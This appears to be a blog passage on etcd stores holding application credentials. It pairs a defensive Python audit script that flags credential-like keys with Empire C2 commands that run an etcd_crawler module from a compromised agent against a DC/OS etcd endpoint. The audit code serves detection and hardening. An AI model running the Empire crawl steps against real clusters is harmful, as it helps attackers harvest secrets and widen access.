etcd is a distributed key-value store that provides a reliable way to store data across a cluster of machines. Configuration stores, including etcd, are frequently used to hold the credentials that applications need to access the services they interact with. If an attacker can query these configuration stores, they may be able to use this information to expand access within a target network.
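
From the defender's side, this exposure can be measured by auditing what the store actually holds. The following is an added example, not code from the original post or from Empire: it walks a saved recursive key listing, assumed to be in the etcd v2 keys API JSON shape, and reports keys that look like credentials. The pattern lists and the sample response are constructed assumptions.

```python
import json
import re

# Key-name fragments that suggest stored credentials (assumed list; tune per environment).
SENSITIVE_NAME = re.compile(
    r"pass(word|wd)?|secret|token|api[_-]?key|credential|private[_-]?key", re.I)
# Value shapes that suggest a secret whatever the key is called:
# a PEM private key header, or user:password@ embedded in a URL.
SENSITIVE_VALUE = re.compile(
    r"-----BEGIN [A-Z ]*PRIVATE KEY-----|://[^/\s:@]+:[^/\s@]+@")

def walk(node):
    """Yield (key, value) for every leaf under an etcd v2 'node' tree."""
    if node.get("dir"):
        for child in node.get("nodes", []):  # empty directories carry no 'nodes'
            yield from walk(child)
    elif "key" in node:
        yield node["key"], node.get("value") or ""

def audit(response_text):
    """Return sorted (key, reason) pairs for leaves that look like credentials.

    Values are deliberately left out so the report can be shared safely.
    """
    root = json.loads(response_text).get("node", {})
    findings = []
    for key, value in walk(root):
        if SENSITIVE_NAME.search(key):
            findings.append((key, "sensitive key name"))
        elif SENSITIVE_VALUE.search(value):
            findings.append((key, "secret-like value"))
    return sorted(findings)

# Constructed sample in the shape of a recursive GET on the v2 keys API.
SAMPLE = json.dumps({"action": "get", "node": {"dir": True, "nodes": [
    {"key": "/app", "dir": True, "nodes": [
        {"key": "/app/db_password", "value": "EXAMPLE-ONLY"},
        {"key": "/app/db_url", "value": "postgres://svc:EXAMPLE@db.internal:5432/app"},
        {"key": "/app/log_level", "value": "info"},
        {"key": "/app/empty", "dir": True},
    ]},
    {"key": "/feature_flags", "dir": True, "nodes": [
        {"key": "/feature_flags/beta", "value": "true"},
    ]},
]}})

if __name__ == "__main__":
    for key, reason in audit(SAMPLE):
        print(f"{key}: {reason}")
```

Every key it reports is a candidate for moving into a dedicated secrets manager, and any result at all from an unauthenticated listing means the store needs authentication and network restrictions.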

We can use the “etcd_crawler” module to list Marathon jobs using the following commands…

(Empire)> agents
(Empire: agents)> interact IHCY2HLZ
(Empire: IHCY2HLZ)> usemodule situational_awareness/network/dcos/etcd_crawler
(Empire: python/situational_awareness/network/dcos/etcd_crawler)> set Target etcd.mesos
(Empire: python/situational_awareness/network/dcos/etcd_crawler)> set Port 1026
(Empire: python/situational_awareness/network/dcos/etcd_crawler)> execute

You can see a quick demo of this process in the following video…

